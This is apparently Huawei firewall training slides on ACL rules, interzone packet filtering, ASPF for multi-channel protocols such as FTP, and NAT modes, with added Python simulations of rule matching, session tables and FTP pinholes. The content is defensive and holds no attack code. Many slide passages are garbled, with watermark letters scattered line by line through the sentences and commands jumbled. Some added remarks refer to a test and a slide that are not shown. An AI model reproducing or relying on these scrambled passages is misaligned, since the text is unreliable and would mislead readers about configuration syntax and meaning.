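            return False
        if not (addr_match(pkt["src"], *self.source) and addr_match(pkt["dst"], *self.destination)):
            return False
        if self.destination_port is not None:
            op, *args = self.destination_port
            if pkt.get("dport") is None or not PORT_OPERATORS[op](pkt["dport"], *args):
                return False
        return True


@dataclass
class AdvancedAcl:
    number: int
    step: int = 5
    rules: List[Rule] = field(default_factory=list)

    def add_rule(self, action: str, protocol: str, rule_id: Optional[int] = None, **kw) -> Rule:
        """Without an explicit rule-id, the next id is the next multiple of the
        step above the largest existing id (assumed numbering behaviour)."""
        if rule_id is None:
            rule_id = 0 if not self.rules else (max(r.rule_id for r in self.rules) // self.step + 1) * self.step
        rule = Rule(rule_id, action, protocol, **kw)
        self.rules = sorted(self.rules + [rule], key=lambda r: r.rule_id)   # config match order
        return rule

    def evaluate(self, pkt: Dict) -> str:
        """First matching rule in rule-id order decides; 'no-match' is handed
        back to the caller (the interface default) rather than permitted."""
        for rule in self.rules:
            if rule.matches(pkt):
                rule.matched += 1
                return rule.action
        return "no-match"

    def display(self) -> str:
        lines = [f"Advanced ACL {self.number}, {len(self.rules)} rules", f"Acl's step is {self.step}"]
        for r in self.rules:
            port = f" destination-port {' '.join(map(str, r.destination_port))}" if r.destination_port else ""
            lines.append(f" rule {r.rule_id} {r.action} {r.protocol}{port} ({r.matched} times matched)")
        return "\n".join(lines)
```

The counters are the quickest way to find rules that never match (candidates for removal) and rules that match far more than expected (a sign that an earlier, broader rule is shadowing the one intended).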

Contents

1. ACL Overview
2. Interface-based Packet Filtering
3. Interzone Packet Filtering
4. Application Analysis of Packet Filtering
n
e
/

Overview of Interzone Packet Filtering om


c
.
Technology
i
e
w
a
u
h
Trust zone
Untrust zone.
g
n
i
Server
n
Firewall
r
Client
a
e
l
/
/
Hit the
:
p
first packet.
t
ht
:
s
e

c
r
u
o
s
Re
g
n
i If it is not the first packet, search the session table.
n
r
a
Le
e
r
o
Search the routing table. Based on the zone and direction of the
interface, search for the interzone packet filtering rule.
Policy0: allows packets with the source address
of 192.168.168.0 through

Policy1: denies packets with the source IP address


of 192.168.100.0

The default interzone packet


filtering rule is prohibited.

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 28
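Added example, not from the training material: a Python model of the first-packet / later-packet split described above. Only the first packet of a flow goes through the routing lookup (omitted here) and the interzone policies; every later packet of that flow, in either direction, is matched in the session table. The two policies and the prohibit default are the slide's; the packets, the policy representation and the counters are constructed for the example.

```python
# Added example (not from the Huawei material): session table in front of
# the interzone policies.  Policies and traffic below are constructed.
import ipaddress
from typing import Dict, List, Tuple

Flow = Tuple[str, str, int, str, int]          # proto, src, sport, dst, dport


class StatefulFirewall:
    """First packet of a flow: interzone policy; later packets in either
    direction: session table only."""

    def __init__(self, policies: List[Dict[str, str]], default_action: str = "deny") -> None:
        self.policies = policies                # checked in order, first match wins
        self.default_action = default_action    # slide: the default interzone rule prohibits
        self.sessions: Dict[Flow, Dict[str, int]] = {}
        self.policy_lookups = 0                 # how often the policy path was taken

    @staticmethod
    def _key(pkt: Dict) -> Flow:
        return (pkt["proto"], pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])

    @staticmethod
    def _reverse(key: Flow) -> Flow:
        proto, src, sport, dst, dport = key
        return (proto, dst, dport, src, sport)

    def _policy_action(self, pkt: Dict) -> str:
        self.policy_lookups += 1
        src = ipaddress.ip_address(pkt["src"])
        for pol in self.policies:
            if src in ipaddress.ip_network(pol["source"]):
                return pol["action"]
        return self.default_action

    def process(self, pkt: Dict) -> str:
        key = self._key(pkt)
        for k in (key, self._reverse(key)):
            if k in self.sessions:              # not the first packet: session table hit
                self.sessions[k]["packets"] += 1
                return "forward"
        if self._policy_action(pkt) == "permit":
            self.sessions[key] = {"packets": 1}  # first packet permitted: create the session
            return "forward"
        return "discard"


POLICIES = [
    {"source": "192.168.168.0/24", "action": "permit"},   # Policy0
    {"source": "192.168.100.0/24", "action": "deny"},     # Policy1
]
```

The last assertion in the test is the point of stateful inspection: a packet that looks like a server reply but belongs to no session is evaluated as a first packet and falls to the prohibit default.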

n
e
/

Interzone Packet Filtering


Application

m
o
c

.
i
e

w
a
u

h
.
Deny packets
from
g
n
an Untrust
zone to a
i
n
r zone.
Trust
a
le

Permit packets from a


Trust zone to an
Untrust zone.

/
/
p:

Trust zone

r
u
o

t
t
h
Firewal
:
s
ce l

Untrust zone

s
e
R

policy interzone trust untrust outbound


policy 0
action permit
policy source 192.168.168.0 0.255.0.255
policy service service-set { service-set-name }

n
r
a

e
r
o

g
n
i

Le

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 29

n
e
/

m
o
c

Policy Priority

.
i
e

w
a
u

Address-set address set


policy 0
action permit
policy source address-set guest
policy destination address-set Internet
policy service service-set Internet
policy 1
action deny

:
s
e policy 0
c
r

u
o
s

Re

policy source address-set guest

h
.
g set
Service-setnport
i
n
r
a
policy 1
e
l
action deny /
/ address-set guest
policy source
:
pdestination address-set intranet
t
policy
ht service service-set intranet
policy

action permit
policy source address-set guest

policy destination address-set Internet


g
policy service service-setnintranet
policy service service-set Internet
i
n
r
a
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 30
Copyrig
o
policy destination address-set intranet
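Added example, not from the training material, covering the address set and service set slide together with the two policy orderings above: a Python evaluation of interzone policies over address sets and service sets, in configured order with the first match deciding. The guest set and the service members are the ones on the set slide; the ERP address set is reused under the name intranet that the policies use, the Internet destination set is taken to mean any address, and the deny result for no match are all assumptions of this example.

```python
# Added example (not from the Huawei material): set-based policies and why
# their order matters.  Set contents follow the slide; see lead-in for assumptions.
import ipaddress
from typing import Dict, List, Set, Tuple

ADDRESS_SETS: Dict[str, List[str]] = {
    # wildcard 0.0.0.15 == /28, 0.0.0.63 == /26, 0.0.0.127 == /25, 0.0.0.255 == /24
    "guest":    ["192.168.12.0/28", "192.168.15.0/26", "192.168.30.0/25"],
    "intranet": ["10.10.0.0/25", "10.16.15.0/24", "10.100.10.0/24"],   # the slide's ERP set
    "Internet": ["0.0.0.0/0"],                                         # assumed: any destination
}
SERVICE_SETS: Dict[str, Set[Tuple[str, int]]] = {
    "Internet": {("tcp", 80), ("tcp", 8080), ("tcp", 8443), ("udp", 53)},
    "intranet": {("tcp", 21), ("tcp", 80), ("tcp", 1521), ("tcp", 8443)},
}


def in_address_set(ip: str, name: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in ADDRESS_SETS[name])


def in_service_set(proto: str, dport: int, name: str) -> bool:
    return (proto, dport) in SERVICE_SETS[name]


def evaluate(policies: List[Dict[str, str]], pkt: Dict) -> str:
    """Policies are checked in listed order; the first one whose source,
    destination and service all match decides.  No match: deny (assumed)."""
    for pol in policies:
        if (in_address_set(pkt["src"], pol["source"])
                and in_address_set(pkt["dst"], pol["destination"])
                and in_service_set(pkt["proto"], pkt["dport"], pol["service"])):
            return pol["action"]
    return "deny"


PERMIT_FIRST = [
    {"action": "permit", "source": "guest", "destination": "Internet", "service": "Internet"},
    {"action": "deny",   "source": "guest", "destination": "intranet", "service": "intranet"},
]
DENY_FIRST = [PERMIT_FIRST[1], PERMIT_FIRST[0]]
```

With the permit policy first, a guest host reaching an intranet server on tcp/8443 is permitted, because the broad Internet policy matches before the deny is ever consulted; with the deny first, the same packet is dropped. The broader policy has to come after the specific one.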

n
e
/

m
o
Multi-Channel Protocol Technology.c
i
e
w
a
Single channel protocol: It uses only one port during communication.
For
u
h
.
example, WWW occupies port 80 only.
g
n
icommunication. In
n
Multi-channel protocol: It uses two or more ports during
r
a
passive FTP mode, the protocol uses port 21 and e
a random port.
l
/
/
:
p
t
t
How to useha pure packet filtering method
: ports used by the multi-channel
to define
s
e at port level?
c
protocol
r
u
o
s
Re
g
A pure packet filtering method cannot define
n
i
data flows for the protocols that use a
n
r
randomly negotiated port.
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 31
Copyrig
o

ASPF Overview

n
e
/

.
i
e

m
o
c

w
a
Application specific packet filter (ASPF) is an advanced filteringu technology,
h
which checks protocol information at the application layerg.
and monitors status
n
i
of the application layer protocol of connections. For all
connections,
n
r
information on connection status is maintained byaASPF and used to
e
l
dynamically determine whether packets can pass
/ through the firewall or
/
:
should be discarded.
p
t
t
h
:
s
e
c
r
u
o
s
Re
Dynamically create and
Monitor
g packets during
n
delete a filtering rule
communication
i
n
r
a Diversified ASPF functions guarantee service security.
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 32
Copyrig
o

ASPF Supporting Multi-Channel Protocols

ASPF applies to packet filtering at the application layer.

(Figure: host 10.0.0.1 opens the FTP control channel to server 20.0.0.1; the server announces "I use port 4952 to establish a data channel with you", and the data channel follows.)

Session table:
FTP:10.0.0.1:4927 --> 20.0.0.1:21
FTP:10.0.0.1:4926 --> 20.0.0.1:4952

ServerMap table:
Inside-Address:Port | Global-Address:Port | Pro | AppType | TTL | Left
20.0.0.1:4952 | -- | tcp | FTP DATA | 00:01:00 | 00:00:47

Port Identification Supporting Multi-Channel Protocol

Port identification is used to map a non-standard protocol port to an identifiable application protocol port.

(Figure: host 10.0.0.1 opens the FTP control channel to FTP server 20.0.0.1:31, then a data channel. Which application protocol is used by port 31? What should I do if I don't know it?)

Configure the basic ACL (ACL 2000-2099) with a rule that permits the source address of the server using the non-standard protocol port:
rule permit source server-ip-address wildcard

Configure port identification (or port mapping):
port-mapping protocol-name port port-number acl acl-number

n
e
/

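The two slides above describe the mechanism but not the bookkeeping. The following is an added example, not Huawei code, that implements an ASPF-style inspector for passive-mode FTP together with port identification: a control channel to 20.0.0.1 on the non-standard port 31 is recognised as FTP because the server is selected by the (assumed) port-mapping ACL, the 227 reply is parsed for the negotiated data port, and a server-map entry with a TTL is created for exactly that socket. The scenario, addresses and the TTL are constructed; the 227 reply encodes port 19*256+88 = 4952, the port on the slide.

```python
"""Added example (not Huawei code): an ASPF-style inspector for passive-mode
FTP, with port identification. Constructed scenario: host 10.0.0.1 talks to
server 20.0.0.1, whose control channel listens on the non-standard port 31."""
import re

# Port identification (port mapping), like "port-mapping ftp port 31 acl 2000":
# only for servers selected by the ACL is port 31 treated as FTP. Assumption:
# the ACL is modelled as a plain set of server addresses.
PORT_MAPPING = {31: "ftp"}                  # non-standard port -> application
PORT_MAPPING_ACL = {"20.0.0.1"}             # servers the mapping applies to
WELL_KNOWN = {21: "ftp"}

# "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)": data port = p1*256 + p2
PASV_RE = re.compile(r"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


class Aspf:
    def __init__(self, servermap_ttl=60):
        self.sessions = set()    # (proto, src, sport, dst, dport) of permitted flows
        self.servermap = {}      # (dst, dport) -> (app_type, expiry)
        self.ttl = servermap_ttl

    def app_type(self, dst, dport):
        """Identify the application of a connection to dst:dport."""
        if dport in WELL_KNOWN:
            return WELL_KNOWN[dport]
        if dst in PORT_MAPPING_ACL:
            return PORT_MAPPING.get(dport)
        return None

    def new_connection(self, src, sport, dst, dport, now=0.0):
        """First packet of a TCP connection. Permitted if it is an FTP control
        channel or if a live server-map entry exists for dst:dport."""
        key = ("tcp", src, sport, dst, dport)
        if self.app_type(dst, dport) == "ftp":
            self.sessions.add(key)
            return True
        entry = self.servermap.get((dst, dport))
        if entry is None or entry[1] < now:
            self.servermap.pop((dst, dport), None)   # expired or absent
            return False
        self.sessions.add(key)                       # data channel: create session
        return True

    def inspect_reply(self, src, sport, dst, dport, payload, now=0.0):
        """Server-to-client control packet: learn the negotiated data port and
        create a server-map entry for exactly that socket, with a TTL."""
        if ("tcp", dst, dport, src, sport) not in self.sessions:
            return None                              # not a tracked control channel
        if self.app_type(src, sport) != "ftp":
            return None
        m = PASV_RE.match(payload)
        if not m:
            return None
        h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
        data_ip, data_port = f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2
        # Added check: only open a pinhole towards the server that sent the
        # reply; a PASV reply naming a third host must not open arbitrary sockets.
        if data_ip != src or data_port < 1024:
            return None
        self.servermap[(data_ip, data_port)] = ("FTP DATA", now + self.ttl)
        return data_ip, data_port


def demo():
    fw = Aspf()
    ctrl = fw.new_connection("10.0.0.1", 4927, "20.0.0.1", 31)           # control channel
    learned = fw.inspect_reply("20.0.0.1", 31, "10.0.0.1", 4927,
                               "227 Entering Passive Mode (20,0,0,1,19,88)\r\n")
    data = fw.new_connection("10.0.0.1", 4926, "20.0.0.1", 4952, now=5)   # pinhole hit
    other = fw.new_connection("10.0.0.1", 4926, "20.0.0.1", 4953, now=5)  # no entry
    late = fw.new_connection("10.0.0.1", 4930, "20.0.0.1", 4952, now=61)  # TTL expired
    bounce = fw.inspect_reply("20.0.0.1", 31, "10.0.0.1", 4927,
                              "227 Entering Passive Mode (10,0,0,99,19,88)\r\n")
    return ctrl, learned, data, other, late, bounce
```

The check that the PASV address equals the server's own address is an addition of this example; without it a malicious server reply could open a pinhole to any host behind the firewall.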
Fragment Cache and Long Connection Functions

Fragment cache function
Configure the aging time of the fragment cache:
firewall session aging-time fragment interval (1-40000)
Disable direct forwarding of fragments:
firewall fragment-forward disable
Enable direct forwarding of fragments:
firewall fragment-forward enable

Long link
Configure the long link aging time:
firewall long-link aging-time time
Enable long link for an interzone:
firewall interzone zone-name1 zone-name2 long-link acl-number { inbound | outbound }
Contents

1. ACL Overview
2. Interface-based Packet Filtering
3. Interzone Packet Filtering
4. Application Analysis of Packet Filtering
Procedure of Firewall Packet Filtering

Flowchart (reconstructed from the slide's labels):

1. An inbound packet arrives. Search the blacklist. Hit: discard the packet.
2. Not hit: search the session table. Hit: update the session entry and forward the packet (outbound packet).
3. Not hit: search the routing table, then search for the interzone ACL and match the packet against the interzone packet-filtering rule.
4. Rule permits: allow the packet (a session entry is created for it). Rule denies: discard the packet.
5. Not matched by any rule: search for the default interzone rule, which allows or discards the packet.
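The flowchart above is the order in which a stateful firewall consults its tables. The following is an added example, not Huawei code, that runs that order over constructed packets: blacklist first, then the session table (so the reply of a permitted flow is forwarded without a rule lookup), then the routing table to find the destination zone, then the first-match interzone rules, and finally a default deny. The zones, interfaces, addresses and rules are constructed for the example; the hosts are those of the interface-based ACL example later in this chapter.

```python
"""Added example (not Huawei code): the packet-filtering procedure of the
flowchart as a small simulator. Constructed data: two zones, a blacklist,
a routing table and first-match interzone rules with a default deny."""
import ipaddress

BLACKLIST = {"203.0.113.9"}
ZONE_OF_INTERFACE = {"ge0/0/1": "trust", "ge0/0/2": "untrust"}
ROUTES = [("192.168.1.0/24", "trust"), ("0.0.0.0/0", "untrust")]   # prefix -> egress zone
# (src_zone, dst_zone, src_net, dst_net, proto, dport or None, action), first match wins
RULES = [
    ("trust", "untrust", "192.168.1.4/32", "0.0.0.0/0", "tcp", None, "permit"),
    ("untrust", "trust", "202.39.2.3/32", "192.168.1.1/32", "tcp", 23, "permit"),
    ("untrust", "trust", "0.0.0.0/0", "192.168.1.0/24", "tcp", 23, "deny"),
]
DEFAULT_ACTION = "deny"   # default interzone rule


def egress_zone(dst):
    """Routing table lookup (longest prefix match) gives the destination zone."""
    addr, best = ipaddress.ip_address(dst), None
    for prefix, zone in ROUTES:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, zone)
    return best[1] if best else None


class Firewall:
    def __init__(self):
        self.sessions = {}   # (proto, src, sport, dst, dport) -> packets seen

    def _interzone_rule(self, src_zone, dst_zone, pkt):
        proto, src, sport, dst, dport = pkt
        for sz, dz, snet, dnet, p, port, action in RULES:
            if (sz, dz, p) != (src_zone, dst_zone, proto):
                continue
            if ipaddress.ip_address(src) not in ipaddress.ip_network(snet):
                continue
            if ipaddress.ip_address(dst) not in ipaddress.ip_network(dnet):
                continue
            if port is not None and port != dport:
                continue
            return action
        return None

    def forward(self, in_interface, pkt):
        """Returns 'forward:<why>' or 'discard:<why>' for one packet."""
        proto, src, sport, dst, dport = pkt
        if src in BLACKLIST:                                  # 1. blacklist
            return "discard:blacklist"
        reverse = (proto, dst, dport, src, sport)
        for key in (pkt, reverse):                            # 2. session table
            if key in self.sessions:
                self.sessions[key] += 1
                return "forward:session"
        dst_zone = egress_zone(dst)                           # 3. routing table
        if dst_zone is None:
            return "discard:no-route"
        action = self._interzone_rule(ZONE_OF_INTERFACE[in_interface], dst_zone, pkt)
        if action is None:                                    # 5. default rule
            action, why = DEFAULT_ACTION, "default"
        else:                                                 # 4. interzone rule
            why = "rule"
        if action == "permit":
            self.sessions[pkt] = 1                            # first packet creates the session
            return "forward:new-session"
        return "discard:" + why


def demo():
    fw = Firewall()
    return (
        fw.forward("ge0/0/1", ("tcp", "192.168.1.4", 50000, "202.39.2.3", 80)),    # rule 1
        fw.forward("ge0/0/2", ("tcp", "202.39.2.3", 80, "192.168.1.4", 50000)),    # reply: session hit
        fw.forward("ge0/0/2", ("tcp", "202.39.2.3", 40000, "192.168.1.1", 23)),    # rule 2
        fw.forward("ge0/0/2", ("tcp", "198.51.100.7", 40000, "192.168.1.2", 23)),  # rule 3 denies
        fw.forward("ge0/0/2", ("tcp", "198.51.100.7", 40000, "192.168.1.2", 80)),  # no rule: default
        fw.forward("ge0/0/2", ("tcp", "203.0.113.9", 40000, "192.168.1.4", 50000)),  # blacklist
    )
```

Note the second packet: it arrives from the Untrust zone, where no rule permits it, yet it is forwarded because it belongs to an existing session. This is the relationship between packet filtering, stateful inspection and the session table asked about in the questions at the end of the chapter.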
Analysis of ACL Application Scenarios

Figure: a firewall with an Internet zone, a Trust zone (192.168.150.1/24 and 192.168.100.1/24) and a DMZ (192.168.168.1/24).

Application scenarios:
ACL in the Trust zone
Application of the address and port sets
Long link between the Trust zone and DMZ
Time-based control between the Trust and Internet zones
ASPF application between the Internet zone and DMZ
Port identification between the Internet zone and DMZ
Fragment cache between the Internet zone and DMZ
Function: NAT/QoS/IPSec/routing policy
ACL Function 1: Packet filtering

Figure: a firewall between two networks. Packets from 202.110.10.0/24 to 172.16.17.10 that use TCP and access resources by using HTTP can pass through the firewall. Packets from 192.110.10.0/24 to 172.16.160.23 that use TCP and access resources by using Telnet cannot pass through the firewall.
ACL Function 2: Address translation

Figure: user group A (192.168.10.0/24) and user group B (172.16.160.0/24) behind a firewall whose interfaces are 10.32.255.50/24 and 58.241.12.253/30 towards the Internet. The ACL selects user group A, so address translation applies to user group A only. The same ACL-based selection is used for QoS, policy routing and IPSec.

Question: Why is the ACL valid for these applications?
ACL Commands

acl [ number ] acl-number [ vpn-instance vpn-instance-name ]

acl-number: defines a numbered ACL. ACLs numbered 2000 to 2999 are basic ACLs; ACLs numbered 3000 to 3999 are advanced ACLs.

vpn-instance vpn-instance-name: defines an ACL for a VPN instance. vpn-instance-name is the name of the VPN instance, a string of 1 to 19 characters.

undo acl { [ number ] acl-number | all }

The acl command creates an ACL and enters the ACL view. The undo acl command deletes an ACL.
ACL Configuration Methods

ACL step

Edit the ACL:
acl 3000
 rule deny source 1.1.1.1 0
 rule permit tcp destination-port equal www
 rule permit ip source 172.16.12.31 0

display acl 3000
Acl's step is 5
 rule 0 deny source 1.1.1.1 0 logging
 rule 3 permit ip source 192.168.10.0 24
 rule 5 deny logging
 rule 10 permit ip source 172.16.12.31 0

Rule IDs are allocated in multiples of the step (5 here: 0, 5, 10). The gaps allow a rule such as rule 3 to be inserted between existing rules by giving its ID explicitly.
ACL Matching Order

Matching order of ACL rules:
config mode: the rules configured first are matched first. In other words, the smaller the rule SN is, the higher the priority is.
auto mode: the matching rule is depth first. In other words, the smaller the address range is, the higher the priority is.

Matching order of various ACLs:
ACLs based on MAC addresses > Advanced ACLs > Basic ACLs

Matching order of ACLs of the same type:
The smaller the ACL number is, the higher the priority is.
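The two slides above (rule step and matching order) change which rule a packet hits. The following is an added example, not Huawei code, that reproduces the ACL 3000 of the configuration slide: rule IDs are handed out in multiples of the step, rule 3 is inserted into the gap, and the same packet from 172.16.12.31 is then matched in config order and in auto order. The "deny any" rule 5 shadows the later permit in config order but not in auto (depth-first) order. Assumption of the example: auto order ranks a rule by the combined prefix length of its source and destination networks, so the smallest address range is tried first.

```python
"""Added example (not Huawei code): ACL rule IDs allocated with a step, and the
config versus auto (depth-first) matching orders of the slide. Assumption: the
auto order ranks rules by the total prefix length of their source and
destination networks, so the smallest address range is tried first."""
import ipaddress


class Acl:
    def __init__(self, number, step=5, match_order="config"):
        self.number, self.step, self.match_order = number, step, match_order
        self.rules = {}   # rule_id -> (action, src_net, dst_net)

    def add_rule(self, action, src="0.0.0.0/0", dst="0.0.0.0/0", rule_id=None):
        """Without an ID the rule gets the next multiple of the step; with an ID
        it can be inserted into the gap between two existing rules."""
        if rule_id is None:
            rule_id = 0 if not self.rules else (max(self.rules) // self.step + 1) * self.step
        self.rules[rule_id] = (action, ipaddress.ip_network(src), ipaddress.ip_network(dst))
        return rule_id

    def ordered(self):
        """Rules in evaluation order."""
        items = sorted(self.rules.items())                       # config: ascending ID
        if self.match_order == "auto":                           # auto: most specific first
            items.sort(key=lambda kv: -(kv[1][1].prefixlen + kv[1][2].prefixlen))
        return items

    def match(self, src, dst):
        """(rule_id, action) of the first matching rule, or None."""
        s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        for rule_id, (action, snet, dnet) in self.ordered():
            if s in snet and d in dnet:
                return rule_id, action
        return None


def demo():
    acl = Acl(3000)                                   # step 5, config order
    acl.add_rule("deny", src="1.1.1.1/32")            # rule 0
    acl.add_rule("deny")                              # rule 5: deny any
    acl.add_rule("permit", src="172.16.12.31/32")     # rule 10
    ids_before = sorted(acl.rules)
    acl.add_rule("permit", src="192.168.10.0/24", rule_id=3)   # inserted between 0 and 5
    ids_after = sorted(acl.rules)
    config_hit = acl.match("172.16.12.31", "10.0.0.1")         # rule 5 shadows rule 10
    acl.match_order = "auto"
    auto_hit = acl.match("172.16.12.31", "10.0.0.1")           # /32 rule wins over /0
    return ids_before, ids_after, config_hit, auto_hit
```

Because the sort is stable, rules of equal specificity keep their ID order in auto mode. The practical lesson is the shadowing in config mode: a broad deny placed before a specific permit silently disables the permit, which is why the rule order (or the choice of auto mode) must be reviewed whenever a rule is inserted.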
Example of Configuring an Interface-based ACL (on CLI)

Figure: Telnet server 192.168.1.1, FTP server 192.168.1.2, WWW server 192.168.1.3 and hosts 192.168.1.4 and 192.168.1.5 on the internal interface of the firewall; external interface 202.38.160.1; external host 202.39.2.3.

Objective: to enable access control between the intranet and the extranet.
1. Allow the host at IP address 192.168.1.4 in the Trust zone to access the Untrust zone.
2. Allow the host at IP address 202.39.2.3 in the Untrust zone to access the servers at IP addresses 192.168.1.1, 192.168.1.2 and 192.168.1.3 in the Trust zone.
3. Allow all hosts in the Trust and Untrust zones to run the ping command to test communication with each other; they communicate well.

Networked devices: PC, firewall, server, router
Example of Configuring an Interface-based ACL (on Web)
Example of Configuring an Interzone ACL (on CLI)

Figure: a firewall with a Local zone, a DMZ on E1/0/0 (192.168.1.1, with host 192.168.1.2) and an Untrust zone on E2/0/0 (192.168.2.1, with host 192.168.2.2); a console port.

Objective: to enable two devices in the DMZ and the Untrust zone of the firewall to ping each other successfully.

Networked devices: PC, firewall, server
Example of Configuring an Interzone ACL (on Web)
Summary

ACL principles
ACL functions and classification
Application scenarios and configurations of interface-based packet filtering
Application scenarios and configurations of interzone packet filtering
Questions

What is the relationship among packet filtering, the status inspection mechanism and the session table?

Fragment cache function: what is the difference between the formats of the first packet fragment and the other fragments? If the first fragment arrives first, which measure is carried out? If the first fragment arrives late, which measure is taken?

What are the application scenarios of port identification (port mapping)?

What is the difference between the application scenarios of interzone packet filtering and interface packet filtering?

What is the difference between inbound of interzone packet filtering and inbound of interface packet filtering? What is the difference between outbound of interzone packet filtering and outbound of interface packet filtering?
Answer
Thank you
www.huawei.com
Chapter 4 Network Address Translation Technology

www.huawei.com
Objectives

Upon completion of this course, you will understand:
NAT technical principles
NAT application modes
Firewall NAT configuration
Contents

1. Introduction to Network Address Translation Technology
2. NAT Technology Based on the Source IP Address
3. NAT Technology Based on the Destination IP Address
4. Bidirectional NAT Technology
5. NAT Application Scenario Configuration
Background Information

The explosive growth of the Internet has led to the depletion of IPv4 addresses.

The next generation of IP technology, IPv6, cannot replace IPv4 on a large scale in a short time.

As technology develops, various techniques for extending the lifespan of IPv4 keep emerging. NAT is one of the most effective of them.
Why NAT is Required

Using private network addresses allows address reuse and increases the utilization of IP address resources.

Private network addresses cannot be routed over public networks; otherwise, routing problems result.

NAT translates a large number of private network addresses into a small number of public network addresses, which keeps communication working and saves IP address resources.

Figure: communication between the private network and the public network without NAT. Intranet user 10.1.1.1 sends a packet with source IP address 10.1.1.1 and destination IP address 123.3.2.3 (the FTP server). No address translation is done; because 10.1.1.1 is a private network address, the route back to it is unknown and the packet is discarded.
Basic Principles of NAT Technology

NAT translates the source address or the destination address in the IP packet header. It enables a large number of private IP addresses to access the public network by sharing a small number of public IP addresses, which effectively slows down the depletion of the IP address space and lets a large number of private network users access the Internet.

Figure: intranet user 10.1.1.1 communicates with FTP server 123.3.2.3 through a NAT device.

Outbound: the private source address is replaced with the public network address.
Before: source IP address 10.1.1.1, destination IP address 123.3.2.3
After: source IP address 123.3.2.1, destination IP address 123.3.2.3

Inbound: the public destination address is replaced with the private network address.
Before: source IP address 123.3.2.3, destination IP address 123.3.2.1
After: source IP address 123.3.2.3, destination IP address 10.1.1.1
NAT Categories

Based on the source IP address translation direction
Outbound direction: the data packets are transferred from a high-security network to a low-security network.
Inbound direction: the data packets are transferred from a low-security network to a high-security network.

Based on whether the source port is translated
No-PAT mode: one-to-one translation of IP addresses, which does not involve port translation.
NAPT mode: many-to-one or many-to-many translation of IP addresses, which involves port translation.

Based on the destination IP address translation function
NAT Server function: a private network server provides services to public network users through this function.
Destination NAT function: destination NAT can be used for Internet access by mobile phone users when the default WAP gateway is not consistent with the gateway provided by the local operator.

Bidirectional NAT
NAT Inbound and NAT Server are used together.
Intrazone NAT and NAT Server are used together.
NAT Advantages and Disadvantages

Advantages
Allows IP address reuse and saves precious address resources.
Is transparent to users during address translation.
Hides the internal network topology from external users.
Implements load balancing of intranet servers.

Disadvantages
Makes network monitoring more difficult.
Does not support some applications.

Hiding addresses is not access control: interzone packet filtering rules still decide what may pass (see the NAT Server configuration later in this chapter, which needs its own permit rules).
Contents

1. Introduction to Network Address Translation Technology
2. NAT Technology Based on the Source IP Address
3. NAT Technology Based on the Destination IP Address
4. Bidirectional NAT Technology
5. NAT Application Scenario Configuration
Overview of NAT Technology Based on the Source IP Address

Conversion based on the source IP address
Figure: a host in the Trust zone sends a packet with source IP address 192.168.0.11 and destination IP address 1.1.1.1; after conversion the packet enters the Untrust zone with source IP address 9.9.9.9 and destination IP address 1.1.1.1.

Conversion based on the source IP address and port
Figure: a host in the Trust zone sends a packet with source IP address 192.168.0.11, source port X and destination IP address 1.1.1.1; after conversion the packet enters the Untrust zone with source IP address 2.2.2.2, source port Y and destination IP address 1.1.1.1.
Differences Between NAT Outbound and NAT Inbound

NAT Outbound
Figure: conversion in the outbound direction, from the high-security zone (Trust) to the low-security zone (Untrust). Source IP address 192.168.0.11, destination IP address 1.1.1.1 becomes source IP address 9.9.9.9, destination IP address 1.1.1.1.

NAT Inbound
Figure: conversion in the inbound direction, from the low-security zone (Untrust) to the high-security zone (DMZ). Source IP address 192.168.0.11, destination IP address 1.1.1.1 becomes source IP address 9.9.9.9, destination IP address 1.1.1.1.
One-to-One Address Translation

The address before conversion is bound to the address after conversion, in order to meet some special requirements. Therefore, this application is seldom used.

Figure: 192.168.1.1 <-> 155.133.87.1, 192.168.1.2 <-> 155.133.87.2, 192.168.1.3 <-> 155.133.87.3
Many-to-Many Address Translation

A segment of addresses used for conversion can be configured as an address pool. During conversion, public addresses in the pool are selected in turn and used as the translated addresses until all addresses in the pool are used up. After that, subsequent private addresses cannot be translated.

Figure: 192.168.1.1 -> 155.133.87.1, 192.168.1.2 -> 155.133.87.2, 192.168.1.3 -> 155.133.87.3, 192.168.1.4 -> discarded (pool exhausted)

Many-to-many address translation is on a first-come first-served basis, whereas one-to-one address translation uses manually configured one-to-one address mappings. In many-to-many address translation, the number of public addresses required equals the number of private addresses being translated at the same time. Therefore, many-to-many address translation is not common either.
Many-to-One Address Translation

Multiple internal addresses are mapped to different port numbers of the same public address in order to implement many-to-one address conversion. The NAPT technology is used to implement many-to-one address conversion.

Figure: 192.168.1.1 -> 155.133.87.1:7111, 192.168.1.2 -> 155.133.87.1:7112, 192.168.1.3 -> 155.133.87.1:7113

NAPT uses Layer 4 information to extend Layer 3 addresses. An IP address has 65,535 ports for use, so in theory one public address can be mapped to 65,535 private addresses, which effectively enlarges the address space and increases the utilization of IP addresses. Therefore, NAPT is a frequently used address translation method. In practice the limit is on concurrent flows rather than hosts: every flow behind a public address needs its own port per transport protocol, so port exhaustion is the constraint to watch.
Configuration Based on Source IP Address Translation (NAT No-PAT)

Configure the NAT address pool in the system view:
nat address-group group-number [ group-name ] start-address end-address

Enter the interzone NAT policy view from the system view:
nat-policy interzone zone-name1 zone-name2 { inbound | outbound }

Create the NAT policy and enter the policy ID view:
policy [ policy-id ]
policy source { source-address source-wildcard | ... }
policy destination { destination-address destination-wildcard | ... }
policy service service-set { service-set-name }
action { source-nat | no-nat }
address-group { number | name } no-pat
Configuration Based on Source IP Address and Port Conversion (NAPT)

Configure the NAT address pool in the system view:
nat address-group group-number [ group-name ] start-address end-address

Enter the interzone NAT policy view from the system view:
nat-policy interzone zone-name1 zone-name2 { inbound | outbound }

Create the NAT policy and enter the policy ID view:
policy [ policy-id ]
